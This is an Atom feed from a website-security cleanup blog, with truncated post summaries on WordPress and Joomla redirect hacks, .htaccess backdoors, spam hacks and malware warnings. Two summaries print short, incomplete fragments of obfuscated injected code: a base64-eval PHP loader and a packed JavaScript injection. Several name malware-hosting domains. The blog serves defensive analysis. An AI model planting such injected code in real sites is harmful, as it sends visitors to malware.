<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8226343625671207502</id><updated>2012-02-23T00:14:29.788-05:00</updated><title type='text'>"Aw Snap" My website has been hacked!  Now what? A few tips from redleg.</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>22</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-412952889693030414</id><published>2012-02-22T15:33:00.001-05:00</published><updated>2012-02-22T15:34:48.899-05:00</updated><title type='text'>Redirects to costabrava.bee.pl or froling.bee.pl</title><summary type='text'>Seems like that has been an uptick in the number of sites I have seen lately with the redirects to costabrava.bee.pl or froling.bee.pl.

Typically redirects to http:// froling . bee . pl/ (costabrava . bee . pl ) are done using a bit of obfuscated PHP code that looks something like this:


eval(base64_decode('Ul9BR0VOVCddOw0KaWYgKCR1YWcpIHs
NCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0c
</summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/412952889693030414/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/412952889693030414'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/412952889693030414'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html' title='Redirects to costabrava.bee.pl or froling.bee.pl'/><author><name>Red Leg</name><uri>http://www.blogger.com/profile/12083359752988855938</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-723040379212392002</id><published>2012-02-14T12:46:00.000-05:00</published><updated>2012-02-17T08:54:50.276-05:00</updated><title type='text'>Malware hosted on 31.184.242.102/</title><summary type='text'>

Update: 02/15/2012 In the hacks I am seeing now, the code is similar to the code listed below, but the domain has changed to http://31.184.242.103/s.php (.103, not .102). This is pretty common with hacks: as soon as Google flags the domain as malicious, the hackers move to a new domain, one that Google has not flagged yet.




I am seeing this hack on a lot of WordPress sites currently. The hack </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/723040379212392002/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2012/02/malware-hosted-on-31184242102.html#comment-form' title='26 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/723040379212392002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/723040379212392002'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2012/02/malware-hosted-on-31184242102.html' title='Malware hosted on 31.184.242.102/'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>26</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-6469612313724240045</id><published>2012-01-18T08:33:00.000-05:00</published><updated>2012-02-09T21:57:57.030-05:00</updated><title type='text'>Malicious redirects in the .htaccess file are being re-written</title><summary type='text'>
In most (if not all) "malicious redirect" .htaccess hacks I have seen recently, site owners have found that after cleaning up the .htaccess file the malicious code is being added back to the file within 30 minutes. This is being done with "backdoor(s)" the hackers have placed on the site. So far these have all been PHP files placed on the site by the hackers. Site owners have reported the </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/6469612313724240045/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2012/01/malicious-htaccess-redirect-re-written.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/6469612313724240045'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/6469612313724240045'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2012/01/malicious-htaccess-redirect-re-written.html' title='Malicious redirects in the .htaccess file are being re-written'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-9094180218879066887</id><published>2011-12-09T12:30:00.001-05:00</published><updated>2012-01-06T13:13:21.546-05:00</updated><title type='text'>Latest WordPress hack?</title><summary type='text'>



Malware hosted on adsa.fr.pn and holala02.in
or
Malware hosted on adsa.cn.pn and piz04.edu.tf
or
Malware hosted on adsa.co.at.pn and topddd14.in

I am seeing a number of WordPress sites hacked with a script call to a "rogue" php file over the last couple of days.  The hacks have all been fairly similar.  The hacker places a "rogue" php file on the site that, in most cases, has </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/9094180218879066887/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/12/latest-wordpress-hack.html#comment-form' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/9094180218879066887'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/9094180218879066887'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/12/latest-wordpress-hack.html' title='Latest WordPress hack?'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-3300604107356261265</id><published>2011-11-07T07:58:00.000-05:00</published><updated>2011-11-23T13:07:37.019-05:00</updated><title type='text'>Malicious software hosted on nl.ai</title><summary type='text'>
The nl.ai hack is widespread on WordPress sites currently.  The hack consists of a block of malicious JavaScript being inserted (usually into the &lt;head&gt;&lt;/head&gt; section) into php pages on the site. Checking a page with the File Viewer Tool will show the code in a page. The malicious code appears like this in a page.


&lt;sc ript&gt;eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?'':e(parseInt(c/a)</summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/3300604107356261265/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/11/malicious-software-hosted-on-nlai.html#comment-form' title='54 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/3300604107356261265'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/3300604107356261265'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/11/malicious-software-hosted-on-nlai.html' title='Malicious software hosted on nl.ai'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>54</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-518577394920747758</id><published>2011-09-22T15:22:00.000-04:00</published><updated>2012-01-22T15:47:40.445-05:00</updated><title type='text'>Early detection of spam hacks on a web site.</title><summary type='text'>I read a post today from John Mueller (Google guy) which I think is a great idea, so I thought I would pass it on in a blog post. The post was in response to a question, Why am I getting &gt; 2000 counts of words like adobe and cs5 on my joomla site? on Google's Webmaster Tools help forum. 

Hopefully you have never had to deal with a spam hack on your site, but if you have you know they can have a </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/518577394920747758/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/09/warning-spam-hacks.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/518577394920747758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/518577394920747758'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/09/warning-spam-hacks.html' title='Early detection of spam hacks on a web site.'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-djbxG9p6Fy4/Tnt82E6TMWI/AAAAAAAAALg/nFdKz3IPId8/s72-c/my-account.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-5788434467258131722</id><published>2011-09-17T12:25:00.000-04:00</published><updated>2011-10-19T10:24:46.188-04:00</updated><title type='text'>redirects to uniqtext.com</title><summary type='text'>I am starting to see a few posts on the forums with sites being hacked to redirect to the domain uniqtext.com. The redirects occur randomly so they can be hard to detect. So far they have all been WordPress and Joomla sites. In addition to the redirect there was spammy links/content being inserted in the pages of the sites. 
In the 5 sites I have looked at the redirect code has been located in the</summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/5788434467258131722/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/09/redirects-to-uniqtext.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5788434467258131722'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5788434467258131722'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/09/redirects-to-uniqtext.html' title='redirects to uniqtext&amp;#46;com'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-5390369399319904749</id><published>2011-08-26T12:54:00.017-04:00</published><updated>2011-10-13T23:23:35.781-04:00</updated><title type='text'>Removing a malware warning Blogspot (Blogger) site</title><summary type='text'>
This question comes up fairly regularly on some of the forums where I participate. Suddenly Chrome or Firefox or Safari is blocking access to my blog with a reported attack sites page, has my blog been hacked? The answer is a very ambiguous "not exactly".

The first thing you need to do is check the Safe Browsing Diagnostic Page for your site at


http://www.google.com/safebrowsing/diagnostic?</summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/5390369399319904749/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/08/malware-blogspot-blooger.html#comment-form' title='16 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5390369399319904749'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5390369399319904749'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/08/malware-blogspot-blooger.html' title='Removing a malware warning Blogspot (Blogger) site'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>16</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-5876396295101292190</id><published>2011-08-22T09:50:00.028-04:00</published><updated>2011-09-17T02:08:36.874-04:00</updated><title type='text'>Malicious software is hosted on newportalse.com, counter-wordpress.com, ?.us.to/kwizhveo.php</title><summary type='text'>

newportalse.com, counter-wordpress.com

There are currently a large number of Wordpress sites that have been hacked where the domain being listed on the warning page is newportalse.com. In most cases the first indicator of this hack has been when the site owner is notified by a user that they have gotten a warning when visiting the site and/or the site owner gets a warning when viewing one of </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/5876396295101292190/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/08/malware-hosted-newportalsecom.html#comment-form' title='28 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5876396295101292190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5876396295101292190'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/08/malware-hosted-newportalsecom.html' title='Malicious software is hosted on newportalse.com, counter-wordpress.com, ?.us.to/kwizhveo.php'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>28</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-5830687794452953084</id><published>2011-06-27T22:53:00.006-04:00</published><updated>2011-07-01T09:08:16.377-04:00</updated><title type='text'>polko.cx.cc, dalanaya.cz.cc, holot.cx.cc kulop.cx.cc, kutol.cx.cc and all the other .(cx|cz).cc(s)</title><summary type='text'>It seems the latest virus that is going around is a JavaScript hack using .cx.cc and .cz.cc domains to host the malware. 
polko.cx.cc/, dalanaya.cz.cc/, holot.cx.cc/ kulop.cx.cc/, kutol.cx.cc/, adrieath.cx.cc/ carolinsoll.cz.cc/ are the most common domains being used currently. These domains will undoubtedly change over time and I will try to keep this list up to date. If the diagnostic page or </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/5830687794452953084/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/06/polko-kulop-kutol-holot.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5830687794452953084'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5830687794452953084'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/06/polko-kulop-kutol-holot.html' title='polko.cx.cc, dalanaya.cz.cc, holot.cx.cc kulop.cx.cc, kutol.cx.cc and all the other .(cx|cz).cc(s)'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-5491338376970898678</id><published>2011-06-16T14:30:00.004-04:00</published><updated>2011-06-27T20:39:54.746-04:00</updated><title type='text'>Cleaning up the alienego.com hack</title><summary type='text'>It seems like there has been a rash of sites getting flagged for the alienego.com hack lately. The alienego hack is an obfuscated JavaScript hack that is hitting all types of sites. If the diagnostic page for your site or the browser warning screen indicates 

Malicious software is hosted on 1 domain(s), including alienego.com/.

Here are a couple of things to look for.

Typically with alienego.com the</summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/5491338376970898678/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/06/cleaning-up-alienegocom-hack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5491338376970898678'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5491338376970898678'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/06/cleaning-up-alienegocom-hack.html' title='Cleaning up the alienego.com hack'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-4238923184861683009</id><published>2011-06-01T08:56:00.007-04:00</published><updated>2011-06-27T20:43:55.480-04:00</updated><title type='text'>Cleaning up the try_pick_colors redef_colors malware.</title><summary type='text'>I have seen an up-tick in the number of sites hacked with the "try pick colors" (aka redef_colors)  hack in the last few weeks.  While this hack has mostly been associated with osCommerce sites, recently the hack has been showing up on increasing numbers of Wordpress and Joomla sites. The hack can, and does show up on virtually any type of site.

The first part of the hack is some obfuscated </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/4238923184861683009/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/06/try-pick-colors-redef-colors.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4238923184861683009'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4238923184861683009'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/06/try-pick-colors-redef-colors.html' title='Cleaning up the try_pick_colors redef_colors malware.'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-4048667084793057179</id><published>2011-05-16T16:45:00.006-04:00</published><updated>2011-06-22T13:59:04.429-04:00</updated><title type='text'>Cleaning up the imgaaa.net (or imgbbb or imgccc or imgddd.net) hack</title><summary type='text'>First, In all the img???.net hacks I have seen so far the hackers have gained access to the sites via stolen FTP credentials from a compromised PC. Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, use a couple of different security packages. Change ALL passwords especially FTP. 
Never store/save your passwords in your FTP client; use secure FTP if </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/4048667084793057179/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/05/cleaning-up-imgaaanet-or-imgbbb-or.html#comment-form' title='20 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4048667084793057179'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4048667084793057179'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/05/cleaning-up-imgaaanet-or-imgbbb-or.html' title='Cleaning up the imgaaa.net (or imgbbb or imgccc or imgddd.net) hack'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>20</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-838916128599359058</id><published>2011-05-15T17:44:00.004-04:00</published><updated>2011-07-08T11:31:11.388-04:00</updated><title type='text'>So just who is a hackers best friend?  (just ranting)</title><summary type='text'>OK guys, I am frustrated today, and while I would advise that you should never ever post anything when frustrated, I am going against my own advice. So this is going to be nothing more than a rant, and if I were you I would not bother reading it.

So who is a hackers best friend?  After several years of looking at many 1000s of hacked websites I have come to the conclusion that without a doubt a </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/838916128599359058/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/05/so-just-who-is-hackers-best-friend.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/838916128599359058'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/838916128599359058'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/05/so-just-who-is-hackers-best-friend.html' title='So just who is a hackers best friend?  (just ranting)'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-3893877009250226152</id><published>2011-05-14T15:56:00.001-04:00</published><updated>2011-05-14T16:22:57.087-04:00</updated><title type='text'>Using Xenu Link SleuthTM to find malicious code on your site.</title><summary type='text'>I saw a post this morning over on the Badwarebusters.org forum from a poster who was assisting a website owner in clearing a imgbbb.net hack. The post

hi, Your problem is the same to me, I look for links to imgbbb.net on the infected site using xenulink ( http://home.snafu.de/tilman/xenulink.html ).  by bk27info 
and thought now that sounds interesting lets give it a try. 

I went to the site </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/3893877009250226152/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/05/using-xenu-link-sleuth-tm-to-find.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/3893877009250226152'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/3893877009250226152'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/05/using-xenu-link-sleuth-tm-to-find.html' title='Using Xenu Link Sleuth&lt;sup&gt;TM&lt;/sup&gt; to find malicious code on your site.'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-hHwmrZefP04/Tc7b5FPiOHI/AAAAAAAAAFk/pDWE2aQ0ZOQ/s72-c/xenu-screen.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-2406368533332794046</id><published>2011-02-27T19:31:00.024-05:00</published><updated>2012-01-28T21:46:32.404-05:00</updated><title type='text'>Spam Hacks, The Pharmacy Hack, The Porn Hack, etc.</title><summary type='text'>The pharmacy hack remains one of the most common posts we see on the Google Webmaster Tools Forum. The posts start out with one of the following questions, "Why has my site suddenly dropped from page 1 of Google search results to page 863?"  
or "Why is Google reporting my most common keyword is viagra or cialis, I can not find those terms anywhere on my site?  A search using the site: operator</summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/2406368533332794046/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/02/pharmacy-hack.html#comment-form' title='37 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/2406368533332794046'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/2406368533332794046'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/02/pharmacy-hack.html' title='Spam Hacks, The Pharmacy Hack, The Porn Hack, etc.'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>37</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-1058566543939105588</id><published>2011-01-17T15:00:00.009-05:00</published><updated>2011-09-11T22:43:42.234-04:00</updated><title type='text'>Google Malware Warning  False Positive?</title><summary type='text'>If you are reading this article you are probably one of the rare readers who arrived on this blog from a search results page and I am afraid you are not going to like what I have to say on the topic, but I hope you will take the time to read through what I have to say. 

I spend a fair amount of time hanging out on Google's Webmaster Tools Forum, the Malware and Hacked sites category and on the </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/1058566543939105588/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/01/malware-warning-false-positive.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/1058566543939105588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/1058566543939105588'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/01/malware-warning-false-positive.html' title='Google Malware Warning  False Positive?'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_rvsS1gG1odA/TTRTkqD1K2I/AAAAAAAAACk/1kMOESgwXSE/s72-c/alt-false-positive.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-4597333970617366772</id><published>2011-01-13T16:33:00.023-05:00</published><updated>2012-01-09T23:12:36.805-05:00</updated><title type='text'>Google says my site is redirecting to a malicious site, but it seems to work fine? Conditional hacks</title><summary type='text'>When a site has been flagged by Google it is all too common for site owners to see this message in the malware section of their Webmaster Tools Account, "When Google last tested this page, no content was returned from your server. 
Instead, the browser was redirected to a malicious web page. It is likely that your server configuration has been modified." However, when the site owner navigates to </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/4597333970617366772/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2011/01/redirect-to-malicious-site.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4597333970617366772'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4597333970617366772'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2011/01/redirect-to-malicious-site.html' title='Google says my site is redirecting to a malicious site, but it seems to work fine? Conditional hacks'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' 